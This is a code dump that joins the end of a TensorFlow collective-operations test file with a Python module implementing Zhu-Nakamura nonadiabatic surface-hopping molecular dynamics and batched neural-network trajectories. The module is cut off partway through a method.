group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
dynamics.py
|
from datetime import datetime
import numpy as np
import random
import torch
import copy
from torch.multiprocessing import set_start_method
from torch.utils.data import DataLoader
from ase.io.trajectory import Trajectory
from nff.md.utils_ax import mol_dot, mol_norm, ZhuNakamuraLogger, atoms_to_nxyz
from nff.md.nvt_ax import NoseHoover, NoseHooverChain
from nff.md.nms import nms_sample
from nff.utils.constants import BOHR_RADIUS, FS_TO_AU, AMU_TO_AU, ASE_TO_FS
from nff.data import Dataset, collate_dicts
from nff.utils.cuda import batch_to
from nff.utils.constants import KCAL_TO_AU, KB_AU
from nff.nn.utils import single_spec_nbrs
from nff.train import load_model, batch_detach
HBAR = 1
OUT_FILE = "trj.csv"
LOG_FILE = "trj.log"
DEF_EXPLICIT_DIABAT = False
DEF_MAX_GAP_HOP = float("inf")
DEFAULT_SKIN = 1.0
METHOD_DIC = {
"nosehoover": NoseHoover,
"nosehooverchain": NoseHooverChain
}
class ZhuNakamuraDynamics(ZhuNakamuraLogger):
"""
Class for running Zhu-Nakamura surface-hopping dynamics. This method follows the description in
Yu et. al, "Trajectory based nonadiabatic molecular dynamics without calculating nonadiabatic
coupling in the avoided crossing case: Trans <-> cis photoisomerization in azobenzene ", Phys.
Chem. Chem. Phys. 2014, doi: 10.1039/c4cp03498h.
Attributes:
atoms (ase.atoms.Atoms): atoms of the system
dt (float): dynamics time-step
max_time (float): maximum time of simulation
time (float): current time
num_states (int): total number of electronic states
Natom (int): number of atoms
out_file (str): name of output file with saved quantities
log_file (str): name of file to log information about trajectory
_time (float): current time in trajectory
_positions (numpy.ndarray): array of atomic positions
_velocities (numpy.ndarray): array of atomic velocities
_forces (numpy.ndarray): array of shape (num_states, num_atoms, 3) for atomic forces,
where num_states is the number of electronic states. The first dimension corresponds
to which state the force is on, the second to which atom the force is on, and the third
to which dimension the force is in.
_energies (numpy.ndarray): array of shape (num_states). There is one energy for each state.
_surf (int): current electronic state that the system is in
_in_trj (bool): whether or not the current frame is "in the trajectory". The frame may not
be in the trajectory in the following example. If an avoided crossing is found, and a
hop occurs, then the last two frames are "removed" from the trajectory and replaced
with a new frame. The new frame has the position of the second last frame, but a new
surface and new re-scaled velocities. In this case the last two frames are not considered
to be in the trajectory.
_hopping_probabilities (list): A list of dictionaries with the Zhu a, b and p parameters.
Each dictionary has information for hopping between different pairs of states.
position_list (list): list of _positions at all past times in the trajectory
velocity_list (list): list of _velocities at all past times in the trajectory
force_list (list): list of _forces at all past times in the trajectory
energy_list (list): list of _energies at all past times in the trajectory
surf_list (list): list of _surf at all past times in the trajectory
in_trj_list (list): list of _in_trj at all past times in the trajetory.
time_list (list): list of times in trajectory
hopping_probability_list (list): list of hopping probabilities at previous times
diabatic_forces (numpy.ndarray): array of shape (2, num_atoms, 3) for the diabatic forces
acting on a lower and upper diabatic state. If self.num_states > 2, the lower and upper
diabatic states depend on which 2 of self.num_states are at an avoided crossing.
diabatic_coupling (float): coupling strength between the upper and lower diabatic state.
zhu_difference (float): Zhu difference parameter, used for calculating hopping probability
zhu_product (float): Zhu product parameter, used for calculating hopping probability
zhu_sign (int): Zhu sign parameter (+/- 1), used for calculating hopping probability
n_vector (numpy.ndarray): Zhu n-vector, of shape (num_atoms, 3), used for calculating
hopping probability
v_parallel (numpy.ndarray): Component of the velocity parallel to the hopping direction. Has
shape (num_atoms), and is used for calculating hopping probability.
ke_parallel (float): Kinetic energy associated with v_parallel.
ke (float): Total kinetic energy
hopping_probabilities (list): A list of dictionaries with the Zhu a, b and p parameters.
Each dictionary has information for hopping between different pairs of states.
Properties:
positions: returns self._positions. Updating positions updates self._positions,
self.positions_list, and positions of self.atoms.
velocities: returns self._velocities. Updating positions updates self._velocities,
self.velocities_list and velocities of self.atoms.
forces: returns self._forces. Updating forces updates self._forces, self.forces_list
and forces of self.atoms.
energies: returns self._energies. Updating energies updates self._energies,
self.energy_list and energies of self.atoms.
surf: returns self._surf. Updating surf updates self._surf and self.surf_list.
in_trj: returns self._in_trj. Updating in_trj updates self._in_trj and self.
time: returns self._time. Updating time updates self.time_list.
hopping_probabilities: returns self._hopping_probabilities. Updating hopping_probabilities
updates self.hopping_probability_list
"""
def __init__(self,
atoms,
timestep,
max_time,
explicit_diabat=DEF_EXPLICIT_DIABAT,
max_gap_hop=DEF_MAX_GAP_HOP,
initial_time=0.0,
initial_surf=1,
num_states=2,
out_file=OUT_FILE,
log_file=LOG_FILE,
save_period=None,
**kwargs):
"""
Initializes a ZhuNakamura instance.
Args:
atoms (ase.atoms.Atoms): atoms of the system
timestep (float): timestep for the dynamics, in femtoseconds
initial_time (float): initial time for the dynamics
max_time (float): total time of simulation
initial_surf (int): initial electronic state for the dynamics. Note that, as always, we use
Python numbering, so that initial_surf = 1 means you start on the first excited state,
and initial_surf = 0 means you start on the ground state.
num_states (int): number of total electronic states
trajectory ():
logfile ():
loginterval ():
Returns:
None
"""
self.atoms = atoms
self.dt = timestep * FS_TO_AU
self.max_time = max_time * FS_TO_AU
self.num_states = num_states
self.Natom = len(atoms)
self.max_gap_hop = max_gap_hop
self.explicit_diabat = explicit_diabat
self.diabat_ens = None
self.diabat_forces = None
self.out_file = out_file
self.log_file = log_file
self.save_period = (save_period if save_period is
not None else self.dt / FS_TO_AU)
self.setup_logging()
# everything in a.u. other than positions (which are in angstrom)
self._positions = atoms.get_positions()
self._velocities = (atoms.get_velocities()
/ BOHR_RADIUS / (ASE_TO_FS * FS_TO_AU))
self._forces = None
self._energies = None
self._surf = initial_surf
self._in_trj = True
self._time = initial_time * FS_TO_AU
self._hopping_probabilities = []
self.position_list = [self._positions]
self.velocity_list = [self._velocities]
self.force_list = None
self.energy_list = None
self.surf_list = [self._surf]
self.in_trj_list = [self._in_trj]
self.time_list = [self._time]
self.hopping_probability_list = [self._hopping_probabilities]
self.old_accel = None
# Initialize Zhu-Nakamura quantities
self.diabatic_forces = np.array([])
self.diabatic_coupling = 0.0
self.zhu_difference = 0.0
self.zhu_product = 0.0
self.zhu_sign = 0
self.n_vector = np.array([])
self.v_parallel = np.array([])
self.ke_parallel = 0.0
self.ke = 0.0
save_keys = ["position_list", "velocity_list", "force_list",
"energy_list", "surf_list", "in_trj_list",
"hopping_probability_list", "time_list"]
super().__init__(save_keys=save_keys, **self.__dict__)
@property
def positions(self):
return self._positions
@property
def velocities(self):
return self._velocities
@property
def forces(self):
return self._forces
@property
def energies(self):
return self._energies
@property
def surf(self):
return self._surf
@property
def in_trj(self):
return self._in_trj
@property
def time(self):
return self._time
@property
def hopping_probabilities(self):
return self._hopping_probabilities
@positions.setter
def positions(self, value):
self._positions = value
# add positions to position_list
self.position_list.append(value)
# update the positions of self.atoms
self.atoms.set_positions(value)
@velocities.setter
def velocities(self, value):
"""
Automatically update quantities associated with velocities when changing the velocities.
Args:
value (numpy.ndarray): new array of velocities
Returns:
None
"""
self._velocities = value
# add velocities to velocity_list
self.velocity_list.append(value)
# update the velocities of self.atoms
self.atoms.set_velocities(value)
@forces.setter
def forces(self, value):
"""
Automatically update quantities associated with forces when changing the forces.
Args:
value (numpy.ndarray): new array of forces
Returns:
None
"""
self._forces = value
# add forces to force_list
if hasattr(self.force_list, "__iter__"):
self.force_list.append(value)
else:
self.force_list = [value]
@energies.setter
def energies(self, value):
"""
Automatically update quantities associated with energies when changing the forces.
Args:
value (numpy.ndarray): new array of energies
Returns:
None
"""
self._energies = value
# add energies to energy_list
if hasattr(self.energy_list, "__iter__"):
self.energy_list.append(value)
else:
self.energy_list = [value]
@surf.setter
def surf(self, value):
"""
Automatically update quantities associated with surf when changing the surface.
Args:
value (int): new surface
Returns:
None
"""
self._surf = value
# add surf to surf_list
self.surf_list.append(value)
@in_trj.setter
def in_trj(self, value):
"""
Automatically update quantities associated with in_trj when changing in_trj.
Args:
value (bool): whether or not the new frame is in the trajectory.
Returns:
None
"""
self._in_trj = value
# add in_trj to in_trj_list
self.in_trj_list.append(value)
@time.setter
def time(self, value):
"""
Automatically update quantities associated with time when changing time.
Args:
value (float): new time
Returns:
None
"""
self._time = value
# add time to time_list
self.time_list.append(value)
@hopping_probabilities.setter
def hopping_probabilities(self, value):
"""
Automatically update quantities associated with hopping probabilities when changing it.
Args:
value (list): new hopping probabilities
Returns:
None
"""
self._hopping_probabilities = value
self.hopping_probability_list.append(value)
def update_forces(self):
"""
Update self.forces by get_forces() on self.atoms
"""
self.forces = self.atoms.get_forces()
def update_energies(self):
"""
Update self.energies by get_potential_energy() on self.atoms
"""
self.energies = self.atoms.get_potential_energy()
def get_masses(self):
"""
Get masses of system atoms.
Returns:
self.atoms.get_masses() (numpy.ndarray): masses
"""
return self.atoms.get_masses()*AMU_TO_AU
def get_accel(self):
"""
Get current acceleration of atoms
Returns:
accel (nump.ndarray): acceleration
"""
# the force is force acting on the current state
force = self.forces[self.surf]
accel = (force / self.get_masses().reshape(-1, 1))
return accel
def position_step(self):
# get current acceleration and velocity
accel = self.get_accel()
self.old_accel = accel
# take a step for the positions
# positions are in Angstrom so they must be properly converted
# Note also that we don't use += here, because that causes problems
# with setters.
self.positions = (self.positions + (self.velocities * self.dt
+ 1 / 2 * accel * self.dt ** 2
) * BOHR_RADIUS)
def velocity_step(self, do_log=True):
new_accel = self.get_accel()
self.velocities = self.velocities + 1 / 2 * \
(new_accel + self.old_accel) * self.dt
# assume the current frame is in the trajectory until
# finding out otherwise
self.in_trj = True
# update surf (which also appends to surf_list)
self.surf = self.surf
self.time = self.time + self.dt
step = int(self.time/self.dt)
rel_ens = ", ".join(((self.energies - self.energies[0]) * 27.2
).reshape(-1).astype("str").tolist())
if do_log:
self.log(f"Completed step {step}. Currently in state {self.surf}.")
self.log(f"Relative energies are {rel_ens} eV")
def md_step(self):
"""
Take a regular molecular dynamics step on the current surface.
"""
self.position_step()
# get forces and energies at new positions
self.update_forces()
self.update_energies()
self.velocity_step()
def check_crossing(self):
"""Check if we're at an avoided crossing by seeing if the energy gap
was at a minimum in the last step.
Args:
None
Returns:
at_crossing (bool): whether we're at an avoided crossing for any combination of states
new_surfs (list): list of surfaces that are at an avoided crossing with the current
surface.
"""
new_surfs = []
at_crossing = False
# if we've taken less than three steps, we can't check if we're at
# an avoided crossing
if len(self.energy_list) < 3 or len(self.surf_list) < 3:
return at_crossing, new_surfs
# all of the past three steps must be in the trajectory. This stops us
# from trying to re-hop after we've already hopped at an avoided
# crossing. If a hop has already happened, then you don't try it again
# at the same position.
if not all(is_in_trj for is_in_trj in self.in_trj_list[-3:]):
return at_crossing, new_surfs
# loop through states other than self.surf and see if they're
# at an avoided crossing
for i in range(self.num_states):
if i == self.surf:
continue
# list of energy gaps
gaps = [abs(energies[i] - energies[self.surf])
for energies in self.energy_list[-3:]]
# whether or not the middle gap is the smallest of the three
gap_min = gaps[0] > gaps[1] and gaps[2] > gaps[1]
if gap_min:
new_surfs.append(i)
at_crossing = True
return at_crossing, new_surfs
def get_diabat_engrads(self,
lower_state,
upper_state):
# update diabatic forces. Start with the r_{ij} parameters
# from the ZN paper units for r_{ij} don't matter since
# they only get called in ratios
r_20 = self.position_list[-1] - self.position_list[-3]
r_10 = self.position_list[-2] - self.position_list[-3]
r_12 = self.position_list[-2] - self.position_list[-1]
# diabatic forecs on the lower state
lower_diabatic_forces = -(-self.force_list[-1][lower_state] * r_10 +
self.force_list[-3][upper_state] * r_12
) / r_20
# diabatic forces on the upper state
upper_diabatic_forces = -(-self.force_list[-1][upper_state] * r_10 +
self.force_list[-3][lower_state] * r_12
) / r_20
# array of forces on the lower and upper diabatic states
diabatic_forces = np.append([lower_diabatic_forces],
[upper_diabatic_forces], axis=0)
# update diabatic coupling
diabatic_coupling = (
self.energy_list[-2][upper_state].item()
- self.energy_list[-2][lower_state].item()) / 2
return diabatic_forces, diabatic_coupling
def update_diabatic_quants(self, lower_state, upper_state):
"""
Update diabatic quantities at an avoided crossing.
Args:
lower_state (int): index of lower electronic state at crossing
upper_state (int): index of upper electronic stte at crossing
Returns:
None
"""
if self.explicit_diabat:
if self.diabat_ens is None:
raise Exception("Diabatic quantities haven't been updated")
self.diabatic_coupling = abs(self.diabat_ens[lower_state,
upper_state])
state_array = np.array([lower_state, upper_state])
self.diabatic_forces = self.diabat_forces[state_array, :]
else:
d_forces, d_coupling = self.get_diabat_engrads(
lower_state=lower_state,
upper_state=upper_state)
self.diabatic_forces = d_forces
self.diabatic_coupling = d_coupling
# update Zhu difference parameter
norm_vec = mol_norm(self.diabatic_forces[1] - self.diabatic_forces[0])
self.zhu_difference = np.sum(norm_vec ** 2 / self.get_masses()) ** 0.5
# update Zhu product parameter and the Zhu sign parameter
prods = self.diabatic_forces[0] * self.diabatic_forces[1]
inner = np.sum(prods / self.get_masses().reshape(-1, 1))
self.zhu_product = abs(inner) ** 0.5
self.zhu_sign = int(np.sign(inner))
# get parallel component of velocity and the associated KE
# First normalize s-vector to give n-vector
s = (self.diabatic_forces[1] - self.diabatic_forces[0]
) / self.get_masses().reshape(-1, 1) ** 0.5
self.n_vector = s / mol_norm(s).reshape(-1, 1)
# Then get ke's
self.v_parallel = mol_dot(self.velocity_list[-2], self.n_vector)
self.ke_parallel = np.sum(
self.get_masses() * (self.v_parallel ** 2) / 2)
self.ke = np.sum(self.get_masses() *
mol_norm(self.velocity_list[-2]) ** 2 / 2)
def rescale_v(self, old_surf, new_surf):
"""
Re-scale the velocity after a hop.
Args:
old_surf (int): old surface
new_surf (int): new surface
Returns:
None
"""
# the energy to consider is actually the energy at the crossing point,
# which is not the current energy but the energy one step before
energy = self.energy_list[-2]
# the component of v parallel to the hopping direction
v_par_vec = self.n_vector * (self.v_parallel).reshape(-1, 1)
# the scaling factor for the velocities
scale_arg = (((energy[old_surf] + (self.ke_parallel)) -
energy[new_surf]) / (self.ke_parallel))
if scale_arg < 0 or np.isnan(scale_arg):
return "err"
scale = scale_arg ** 0.5
velocities = scale * v_par_vec + \
(self.velocity_list[-2] - v_par_vec)
if np.isnan(velocities).any():
return "err"
self.velocities = velocities
def update_probabilities(self):
"""
Update the Zhu a, b and p probabilities.
"""
hopping_probabilities = []
at_crossing, new_surfs = self.check_crossing()
# if we're not at a crossing, then the hopping probabilities
# shouldn't be considered
if not at_crossing:
self.hopping_probabilities = hopping_probabilities
return
# if the molecule's exploded then move on
if ('nan' in self.positions.astype("str")
or 'nan' in self.forces.astype("str")):
self.hopping_probabilities = hopping_probabilities
return
for new_surf in new_surfs:
# get the upper and lower state by sorting the current
# surface and the new one
lower_state, upper_state = sorted((self.surf, new_surf))
# If requested, only consider a hop if the gap is below
# a certain value. Don't just get the gap as 2 * the
# diabatic coupling, because that's not the case if
# we use explicit diabatic states
gap = abs(self.energy_list[-2][upper_state].item()
- self.energy_list[-2][lower_state].item())
if gap > self.max_gap_hop:
hopping_probabilities.append({"zhu_a": 0,
"zhu_b": 0,
"zhu_p": 0,
"new_surf": new_surf})
continue
# another place it might fail with nan
try:
self.update_diabatic_quants(lower_state, upper_state)
except ValueError:
return
# use context manager to ignore any divide by 0's
with np.errstate(divide='ignore', invalid='ignore'):
# calculate the zhu a parameter
a_numerator = (HBAR ** 2 / 2 * self.zhu_product
* self.zhu_difference)
a_denominator = (2 * self.diabatic_coupling) ** 3
zhu_a = np.nan_to_num(
np.divide(a_numerator, a_denominator) ** 0.5)
# calculate the zhu b parameter, starting with Et and Ex
et = self.ke_parallel + self.energy_list[-2][self.surf].item()
ex = (self.energy_list[-2][upper_state].item() +
self.energy_list[-2][lower_state].item()) / 2
b_numerator = (et - ex) * self.zhu_difference / \
self.zhu_product
b_denominator = 2 * self.diabatic_coupling
zhu_b = np.nan_to_num(
np.divide(b_numerator, b_denominator) ** 0.5)
# calculating the hopping probability
zhu_p = np.nan_to_num(
np.exp(-np.pi / 4 / zhu_a *
(2 / (zhu_b ** 2 +
(abs((zhu_b ** 4) + (self.zhu_sign) * 1.0))
** 0.5)) ** 0.5))
# add this info to the list of hopping probabilities
hopping_probabilities.append({"zhu_a": zhu_a,
"zhu_b": zhu_b,
"zhu_p": zhu_p,
"new_surf": new_surf})
self.hopping_probabilities = hopping_probabilities
def should_hop(self, zhu_p):
"""
Decide whether or not to hop based on the zhu a, b and p parameters.
Args:
zhu_a (float): Zhu a parameter
zhu_b (float): Zhu b parameter
zhu_p (float): hopping probability
Returns:
will_hop (bool): whether or not to hop
"""
rnd = np.random.rand()
will_hop = (zhu_p > rnd)
return will_hop
def hop(self, new_surf):
"""
Hop from the current surface to a new surface at an avoided crossing.
Args:
new_surf (int): index of new surface
Returns:
None
"""
# re-scale the velocity
out = self.rescale_v(old_surf=self.surf, new_surf=new_surf)
if out == "err":
return out
# change the surface
self.surf = new_surf
# reset to the second last position for positions, energies, and forces
self.positions = self.position_list[-2]
self.energies = self.energy_list[-2]
self.forces = self.force_list[-2]
# set the frame to be in the trajectory, but the previous
# two frames to be out of the trajectory
self.in_trj = True
self.in_trj_list[-2] = False
self.in_trj_list[-3] = False
# add a new empty hopping probability list
self.hopping_probabilities = []
self.time = self.time - self.dt
self.modify_save()
def full_step(self,
compute_internal_forces=True,
do_log=True):
"""
Take a time step.
"""
if compute_internal_forces:
self.md_step()
# update the hopping probabilities
self.update_probabilities()
# randomly order the self.hopping_probabilities list.
# If, for some reason, two sets of states
# are both at an avoided crossing, then we'll first
# try to hop between the first set of states.
# If this fails then we'll try to hop between the second
# set of states. To avoid biasing in
# the direction of one hop vs. another, we randomly shuffle
# the order of self.hopping_probabilities
# each time.
random.shuffle(self.hopping_probabilities)
# loop through sets of states to hop between
for probability_dic in self.hopping_probabilities:
zhu_p = probability_dic["zhu_p"]
new_surf = probability_dic["new_surf"]
old_surf = copy.deepcopy(self.surf)
if do_log:
self.log(f"Attempting hop from state {old_surf} to state "
f"{new_surf}. Probability is {zhu_p}.")
# decide whether or not to hop based on Zhu a, b, and p
will_hop = self.should_hop(zhu_p)
# hop and end loop if will_hop == True
if will_hop:
out = self.hop(new_surf)
if out != "err":
if do_log:
self.log(f"Hopped from state {old_surf} "
f"to state {new_surf}.")
return
else:
if do_log:
self.log(f"Did not hop from state {old_surf} "
f"to state {new_surf}.")
def run(self):
# save intitial conditions
self.update_energies()
self.update_forces()
self.save()
time_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
rel_ens = ", ".join(((self.energies - self.energies[0]) * 27.2
).reshape(-1).astype("str").tolist())
self.log(f"Beginning surface hopping at {time_str}.")
self.log(f"Relative energies are {rel_ens} eV")
while self.time < self.max_time:
self.step()
self.save()
# self.output_to_json()
time_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.log(f"Surface hopping completed normally at {time_str}.")
class NoseHooverZN(ZhuNakamuraDynamics):
def __init__(self,
temperature,
ttime,
**kwargs):
ZhuNakamuraDynamics.__init__(self, **kwargs)
self.zeta = 0.0
self.ttime = ttime
self.temp = temperature * KB_AU
n_atom = len(self.atoms)
self.n_dof = (3.0 * n_atom - 6)
self.targe_ekin = 0.5 * self.n_dof * self.temp
self.Q = self.n_dof * self.temp * (self.ttime * self.dt) ** 2
def get_kinetic_energy(self,
vel=None):
if vel is None:
vel = self.velocities
ke = np.sum(self.get_masses() * mol_norm(vel) ** 2 / 2)
return ke
def position_step(self):
# get current acceleration and velocity
accel = self.get_accel()
self.old_accel = accel
delta_pos = (self.velocities * self.dt
+ (accel - self.zeta * self.velocities)
* 0.5 * self.dt ** 2) * BOHR_RADIUS
self.positions = self.positions + delta_pos
def velocity_step(self, do_log=True):
# NVT stuff
# ke before half velocity step
ke_0 = self.get_kinetic_energy()
# make a half step in velocity
# (don't update v yet because it will mess up the "append to
# velocity list" part of the velocity setter)
v_half = (self.velocities + 0.5 * self.dt *
(self.old_accel - self.zeta * self.velocities))
# make a half step in zeta
z_half = (self.zeta + 0.5 * self.dt /
self.Q * (ke_0 - self.targe_ekin))
# make another half step in zeta
ke_1 = self.get_kinetic_energy(v_half)
self.zeta = (z_half + 0.5 * self.dt /
self.Q * (ke_1 - self.targe_ekin))
# make another half step in velocity
new_accel = self.get_accel()
self.velocities = ((v_half + 0.5 * self.dt * new_accel) /
(1 + 0.5 * self.dt * self.zeta))
# temp = self.get_kinetic_energy() / (1 / 2 * self.n_dof) / KB_AU
# print("Temperature = %.2f K" % temp)
# ZN stuff
# assume the current frame is in the trajectory until
# finding out otherwise
self.in_trj = True
# update surf (which also appends to surf_list)
self.surf = self.surf
self.time = self.time + self.dt
step = int(self.time/self.dt)
rel_ens = ", ".join(((self.energies - self.energies[0]) * 27.2
).reshape(-1).astype("str").tolist())
if do_log:
self.log(f"Completed step {step}. Currently in state {self.surf}.")
self.log(f"Relative energies are {rel_ens} eV")
class BatchedZhuNakamura:
"""
A class for running several Zhu Nakamura trajectories at once. This is done by taking a half
step for each trajectory, combining all the xyz's into a dataset and batching it for the
network, and then de-batching to put the forces and energies
back in the trajectories.
Attributes:
num_trj (int): number of concurrent trajectories
zhu_trjs (list): list of ZhuNakamura instances
max_time (float): maximum simulation time
energy_keys (list): names of outputted energies
grad_keys (list): names of outputted gradient keys
props (dict): dataset properties
nbr_update_period (float): how often to update the neighbor list
device (int): GPU device
model (torch.nn): neural network model
batch_size (int): size of batches to be fed into network
cutoff (float): neighbor list cutoff in schnet
cutoff_skin (float): extra amount of distance to add to cutoff
to deal with atoms becoming neighbors between neighbor list
updates
"""
def __init__(self,
atoms_list,
props,
batched_params,
zhu_params,
modelparams=None,
model_type=None,
needs_angles=False):
"""
Initialize.
Args:
atoms_list (list): list of ASE atom objects
props (dict): dictionary of dataset props
batched_params (dict): parameters related to the batching process
zhu_params (dict): parameters related to Zhu Nakamura
"""
self.num_trj = batched_params["num_trj"]
self.zhu_trjs = self.make_zhu_trjs(atoms_list, zhu_params)
self.explicit_diabat = zhu_params.get("explicit_diabat",
DEF_EXPLICIT_DIABAT)
self.max_time = self.zhu_trjs[0].max_time
self.energy_keys = [f"energy_{i}" for i in
range(self.zhu_trjs[0].num_states)]
self.grad_keys = [f"{key}_grad" for key in self.energy_keys]
self.props = self.duplicate_props(props)
self.nbr_update_period = batched_params["nbr_update_period"]
self.device = batched_params["device"]
self.model = load_model(batched_params["weight_path"],
params=modelparams,
model_type=model_type)
self.model.eval()
self.model.to(self.device)
self.batch_size = batched_params["batch_size"]
self.cutoff = batched_params["cutoff"]
self.cutoff_skin = batched_params.get("cutoff_skin",
DEFAULT_SKIN)
self.needs_angles = needs_angles
# for saving at intervals
self.save_period = min([trj.save_period for trj in
self.zhu_trjs])
self.dt = min([trj.dt for trj in self.zhu_trjs])
def make_zhu_trjs(self, atoms_list, zhu_params):
"""
Instantiate the Zhu Nakamura objects.
Args:
atoms_list (list): list of ASE atom objects
zhu_params (dict): parameters related to Zhu Nakamura
Returns:
zhu_trjs (list): list of ZhuNakamura trajectory objects
"""
assert len(atoms_list) == self.num_trj
# base names for the output and log files
base_out_name = zhu_params.get("out_file", OUT_FILE).split(".csv")[0]
base_log_name = zhu_params.get("log_file", LOG_FILE).split(".log")[0]
zhu_trjs = []
for i, atoms in enumerate(atoms_list):
these_params = copy.deepcopy(zhu_params)
these_params["out_file"] = f"{base_out_name}_{i}.csv"
these_params["log_file"] = f"{base_log_name}_{i}.log"
thermostat = these_params.get("thermostat", "none").lower()
class_dic = {"none": ZhuNakamuraDynamics,
"nosehoover": NoseHooverZN}
zn_class = class_dic[thermostat]
zhu_trjs.append(zn_class(atoms=atoms, **these_params))
return zhu_trjs
def duplicate_props(self, props):
"""
Duplicate properties, once for each trajectory.
Args:
props (dict): dictionary of dataset props
Returns:
new_props (dict): dictionary updated for each trajectory
"""
new_props = dict()
for key, val in props.items():
if isinstance(val, list):
new_props[key] = val * self.num_trj
elif hasattr(val, "tolist"):
typ = type(val)
new_props[key] = typ((val.tolist()) * self.num_trj)
else:
raise Exception
new_props.update({key: None for key in
[*self.energy_keys, *self.grad_keys]})
new_props["num_atoms"] = new_props["num_atoms"].long()
return new_props
def update_energies_forces(self,
trjs,
get_new_neighbors):
"""
Update the energies and forces for the molecules of each trajectory.
Args:
trjs (list): list of trajectories
get_new_neighbors (bool): whether or not to update the neighbor list
Returns:
None
"""
nxyz_data = [torch.Tensor(atoms_to_nxyz(trj.atoms)) for trj in trjs]
props = {"nxyz": nxyz_data,
"nbr_list": self.props["nbr_list"],
"num_atoms": self.props['num_atoms']}
dataset = Dataset(props=props,
units='kcal/mol',
check_props=False)
if get_new_neighbors:
# can stack the nxyz's and generate the neighbor list
# accordingly because all geoms correspond to the
# same molecule
nbrs = single_spec_nbrs(dset=dataset,
cutoff=(self.cutoff +
self.cutoff_skin),
device=self.device,
directed=True)
dataset.props['nbr_list'] = nbrs
# dataset.generate_neighbor_list(self.cutoff)
if self.needs_angles:
dataset.generate_angle_list()
dataset.props["num_atoms"] = dataset.props["num_atoms"].long()
self.props = dataset.props
loader = DataLoader(dataset,
batch_size=self.batch_size,
collate_fn=collate_dicts)
for i, batch in enumerate(loader):
batch = batch_to(batch, self.device)
results = self.model(batch)
results = batch_detach(results)
for key in self.grad_keys:
N = batch["num_atoms"].cpu().detach().numpy().tolist()
results[key] = torch.split(results[key], N)
current_trj = i * self.batch_size
for j, trj in enumerate(trjs[current_trj:
current_trj + self.batch_size]):
energies = []
forces = []
for key in self.energy_keys:
energy = (results[key][j].item())*KCAL_TO_AU["energy"]
force = (
(-results[key + "_grad"][j]).detach(
).cpu().numpy()
) * KCAL_TO_AU["energy"]*KCAL_TO_AU["_grad"]
energies.append(energy)
forces.append(force)
trj.energies = np.array(energies)
trj.forces = np.array(forces)
def add_diabat_forces(self):
diabat_trjs = []
diabat_idx = []
for i, trj in enumerate(self.zhu_trjs):
at_crossing, _ = trj.check_crossing()
if at_crossing:
diabat_trjs.append(trj)
diabat_idx.append(i)
else:
# reset to None to catch any silent errors of
# reusing the old diabatic forces
trj.diabat_ens = None
trj.diabat_forces = None
# create a dataset and limit to only the trajectories you
# care about
dataset = Dataset(props=self.props.copy(),
units='kcal/mol',
check_props=False)
diabat_idx = torch.LongTensor(diabat_idx)
dataset.change_idx(diabat_idx)
